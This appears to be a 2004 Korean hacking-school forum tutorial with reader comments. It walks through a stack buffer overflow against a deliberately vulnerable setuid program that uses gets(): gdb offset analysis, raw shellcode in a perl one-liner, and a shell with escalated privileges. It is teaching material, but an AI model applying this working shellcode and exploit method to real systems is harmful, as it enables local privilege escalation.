   ssuckies
   http://www.ganseo.com
   BOF 해결 무작정 따라하기 #1

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=181 [º¹»ç]


Produced by ganseo
e-mail : postmaster@ganseo.com
homepage : http://www.ganseo.com

아래 문서에서 주석처리된 부분이 설명입니다.
초보자들이 쉽게 따라 할 수 있도록 한번 만들어 봤습니다.
제 워게임 서버에서 테스트 해봤습니다.
두가지 버젼으로 준비해 봤습니다.
직접 버퍼에 쉘코드를 집어넣고 하는 방법과 egg 프로그램을 이용하는 방법입니다.

gcc 버젼 정보입니다.
[root@localhost .test]# gcc -v      
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)

[root@localhost /]# mkdir .test
[root@localhost /]# cd .test
//test 환경을 만들어 보겠습니다. 쓰지 말아야할 gets함수를 썼습니다.^^
[root@localhost .test]# cat > testApp.c        
#include <stdio.h>
/* Deliberately vulnerable demo target: reads one line from stdin into a
 * fixed-size stack buffer with gets() and echoes it back.
 * `void main` is non-standard (gcc reports this at build time); argc/argv
 * are unused. */
void main(int argc , char** argv)
{
        char buffer[200];   /* 200 bytes on the stack: room for 199 chars + NUL, nothing more */

        printf("type ur words : ");
        /* gets() takes no length: it copies stdin up to the newline with no
         * bound, so any line longer than 199 bytes runs past `buffer` into the
         * saved frame pointer and return address above it (the 300-byte input
         * in the transcript below crashes the process). The linker flags it as
         * dangerous for exactly this reason; the bounded replacement is
         * fgets(buffer, sizeof buffer, stdin). */
        gets(buffer);
        printf("words = %s\n" , buffer);
}
[root@localhost .test]# gcc -o testApp testApp.c
testApp.c: In function `main':
testApp.c:3: warning: return type of `main' is not `int'
/tmp/ccFrX0ch.o: In function `main':
/tmp/ccFrX0ch.o(.text+0x24): the `gets' function is dangerous and should not be used.
[root@localhost .test]# chmod 4750 testApp
[root@localhost .test]# chown recluse8 testApp
[root@localhost .test]# chgrp recluse7 testApp
[root@localhost .test]# ls -al
합계 28
drwxr-xr-x    2 root     root         4096  4월 10 00:08 .
drwxr-xr-x   21 root     root         4096  4월  9 23:17 ..
-rwsr-x---    1 recluse8 recluse7    13842  4월 10 00:08 testApp
-rw-r--r--    1 root     root          155  4월 10 00:08 testApp.c
[root@localhost .test]#




//프로그램을 펄을 가지고 실험해보았습니다.
[root@localhost .test]# (perl -e 'print "A"x300';cat)|./testApp

type ur words : words = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

세그멘테이션 오류
[root@localhost .test]#

//세그멘테이션 오류가 나는걸 보니 bof가 일어납니다.



/*
*첫번째 방법입니다.
*일단 gdb로 disassemble 해서 우리가 넣을 버퍼의 주소와 ret address가 들어갈 부분을 알아보도록 하겠습니다.
*주변 지식은 ganseo.com의 문서를 참조하세요.
*앞으로 우리는 A로 채웠던 부분에 우리의 쉘코드를 넣을테고 main함수의 ret address부분에
*우리가 넣은 쉘코드의 주소를 넣어줄 예정입니다.^^
*/
[root@localhost .test]# gdb -q testApp
(gdb) disass main
Dump of assembler code for function main:
0x8048490 <main>:       push   %ebp
0x8048491 <main+1>:     mov    %esp,%ebp
0x8048493 <main+3>:     sub    $0xd8,%esp
//buf를 컴파일러가 dummy와 함께 이만큼 잡는다. 10진수로 216
//그러면 앞으로 찾아볼 ebp - 0xd8을 한곳에 입력받은 값이 들어갈 것이라 예상할수 있다.
0x8048499 <main+9>:     sub    $0xc,%esp
0x804849c <main+12>:    push   $0x8048548
0x80484a1 <main+17>:    call   0x804836c <printf>
0x80484a6 <main+22>:    add    $0x10,%esp
0x80484a9 <main+25>:    sub    $0xc,%esp
0x80484ac <main+28>:    lea    0xffffff28(%ebp),%eax
0x80484b2 <main+34>:    push   %eax
0x80484b3 <main+35>:    call   0x804833c <gets>
0x80484b8 <main+40>:    add    $0x10,%esp
0x80484bb <main+43>:    sub    $0x8,%esp
0x80484be <main+46>:    lea    0xffffff28(%ebp),%eax
0x80484c4 <main+52>:    push   %eax
0x80484c5 <main+53>:    push   $0x8048559
0x80484ca <main+58>:    call   0x804836c <printf>
0x80484cf <main+63>:    add    $0x10,%esp
0x80484d2 <main+66>:    leave  
0x80484d3 <main+67>:    ret    
0x80484d4 <main+68>:    nop    
0x80484d5 <main+69>:    nop    
0x80484d6 <main+70>:    nop    
0x80484d7 <main+71>:    nop    
0x80484d8 <main+72>:    nop    
0x80484d9 <main+73>:    nop    
0x80484da <main+74>:    nop    
0x80484db <main+75>:    nop    
0x80484dc <main+76>:    nop    
0x80484dd <main+77>:    nop    
0x80484de <main+78>:    nop    
0x80484df <main+79>:    nop    
End of assembler dump.
(gdb)

//ebp를 찾아서 ret address가 어디있는지 추측해보자.
(gdb) b *(main+3)
0x08048493 in main ()
(gdb) info reg
eax            0x40158ac0       1075153600
ecx            0x0      0
edx            0x0      0
ebx            0x40159fd0       1075158992
esp            0xbffffab8       0xbffffab8        
ebp            0xbffffab8       0xbffffab8                //여기가 ebp다. 그렇다면 ebp + 4 부분에 우리가 만들 쉘코드의 address를 넣어주면 되겠다.
esi            0x40015e4c       1073831500
edi            0xbffffb24       -1073743068
eip            0x8048493        0x8048493
eflags         0x396    918
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400458fe       1074026750
foseg          0x2b     43
fooff          0x808fc74        134806644
fop            0x2e9    745
xmm0           0x00000000000000000000000000000000
xmm1           0x00000000000000000000000000000000
xmm2           0x00000000000000000000000000000000
xmm3           0x00000000000000000000000000000000
xmm4           0x00000000000000000000000000000000
xmm5           0x00000000000000000000000000000000
xmm6           0x00000000000000000000000000000000
xmm7           0x00000000000000000000000000000000
mxcsr          0x1f80   8064
(gdb)




(gdb) b *(main+58)
Breakpoint 1 at 0x80484ca
(gdb) r
Starting program: /.test/testApp
type ur words : AAAAAAAAAAAAAAA

Breakpoint 1, 0x080484ca in main ()
(gdb)

(gdb) x/100bx 0xbffff9e0
(gdb) x/100bx 0xbffff9d0
0xbffff9d0:     0x59    0x85    0x04    0x08    0xe0    0xf9    0xff    0xbf
0xbffff9d8:     0x74    0x61    0xdf    0x03    0xa0    0xfa    0xff    0xbf
0xbffff9e0:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41        //추측한대로 ebp - 0xd8부분에 A(0x41)이 들어가있다.
0xbffff9e8:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x00
0xbffff9f0:     0xfc    0x1b    0x03    0x40    0xe0    0x63    0x01    0x40
0xbffff9f8:     0x01    0x00    0x00    0x00    0xa0    0x81    0x04    0x08
0xbffffa00:     0x94    0x60    0x01    0x40    0x8e    0xff    0x77    0x01
0xbffffa08:     0x8e    0xff    0x77    0x01    0xd0    0xfa    0xff    0xbf
0xbffffa10:     0xf8    0x5e    0x01    0x40    0x4c    0x82    0x04    0x08
0xbffffa18:     0x10    0x69    0x69    0x0d    0x5c    0xfa    0xff    0xbf
0xbffffa20:     0xec    0x46    0x03    0x40    0xe0    0x63    0x01    0x40
0xbffffa28:     0xc0    0x66    0x01    0x40    0x01    0x00    0x00    0x00
0xbffffa30:     0x00    0x00    0x00    0x00
(gdb)

//이제 우리가 넣을 쉘코드의 주소도 알아냈고 쉘코드 주소가 들어가야할 부분의 주소도 알아냈으니
//간단한 펄스크립트를 만들어보자. 쉘코드는 문서를 참조하시길...
[root@localhost .test]# id recluse8
uid=1008(recluse8) gid=1008(recluse8) groups=1008(recluse8)

//쉘코드 byte 63
//main의 return address 까지의 byte  216 + 4 = 220
[root@localhost .test]# su recluse7
[recluse7@localhost .test]$ (perl -e 'print "\x90"x156';perl -e 'print "\x31\xc9\x66\xb9\xf0\x03\x31\xdb\x66\xbb\xf0\x03\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x00"';perl -e 'print "\xe0\xf9\xff\xbf"';cat)|./testApp

type ur words : words = 1?¹ð1?»ð1À°FÍë^1ÀFF  V
                                             ?N?ÛØ@Íè?ÿÿ/bin/sh
                                              ?
id
uid=1008(recluse8) gid=1007(recluse7) groups=1007(recluse7)

성공했습니다.


  Hit : 14447     Date : 2004/04/12 02:01



    
singalnnn 뭔 소린지 모르겄습니다요... 2004/04/13
Totory 머라는거야 -_- 2004/04/14
풍림화산 이걸보고 모른다면 BOF공부 기초부터 하세요 실기를 상세히 설명한것인데..왜.. 2004/04/16
dlxorud90 기초 어디서는어디서 하는것이죠? 2004/04/20
ssuckies www.ganseo.com 입니다.^^ 2004/04/22
UNIXSVR4 ㅋㅋㅋ shellcode는 귀찮은거여... 2007/07/16
UNIXSVR4 정말대단하십니다.이렇게 쉽게 bof를 설명하시다니... 정말 어렵게 공부했는데.. 2007/07/16